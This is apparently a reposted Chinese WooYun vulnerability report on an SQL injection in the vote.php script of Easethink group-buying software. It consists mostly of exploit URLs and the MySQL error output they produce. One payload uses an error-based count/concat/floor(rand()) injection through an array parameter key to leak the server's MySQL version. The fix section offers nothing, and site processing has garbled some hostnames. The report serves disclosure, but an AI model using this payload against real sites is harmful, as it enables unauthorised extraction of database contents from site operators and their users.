会记录cookie ,请求一次清除一下cookie。 http://demo.easethink测试数据/vote.php?act=dovote&name[a%27][111]=aa MySQL server error report:Array ( [0] => Array ( [message] => MySQL Query Error ) [1] => Array ( [sql] => select * from t_vote_result where name = 'aa' and vote_id = 0 and vote_ask_id = a\' ) [2] => Array ( [error] => You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '\'' at line 1 ) [3] => Array ( [errno] => 1064 ) ) 利用直接暴错方式注入 HdhCmsTest2cto测试数据 漏洞 证明:http://demo.easethink测试数据/vote.php?act=dovote&name[1 and (select 1 from(select count(*),concat(0x7c,(select (Select version()) from information_schema.tables limit 0,1),0x7c,floor(rand(0)*2))x from information_schema.tables group by x limit 0,1)a)%23][111]=aa MySQL server error report:Array ( [0] => Array ( [message] => MySQL Query Error ) [1] => Array ( [sql] => select * from t_vote_result where name = 'aa' and vote_id = 0 and vote_ask_id = 1 and (select 1 from(select count(*),concat(0x7c,(select (Select version()) from information_schema.tables limit 0,1),0x7c,floor(rand(0)*2))x from information_schema.tables group by x limit 0,1)a)# ) [2] => Array ( [error] => Duplicate entry '|5.1.48|1' for key 'group_key' ) [3] => Array ( [errno] => 1062 ) ) 修复方案:您懂得! 作者kobin97@乌云
查看更多关于易想团购SQL注射漏洞 - 网站安全 - 自学php的详细内容...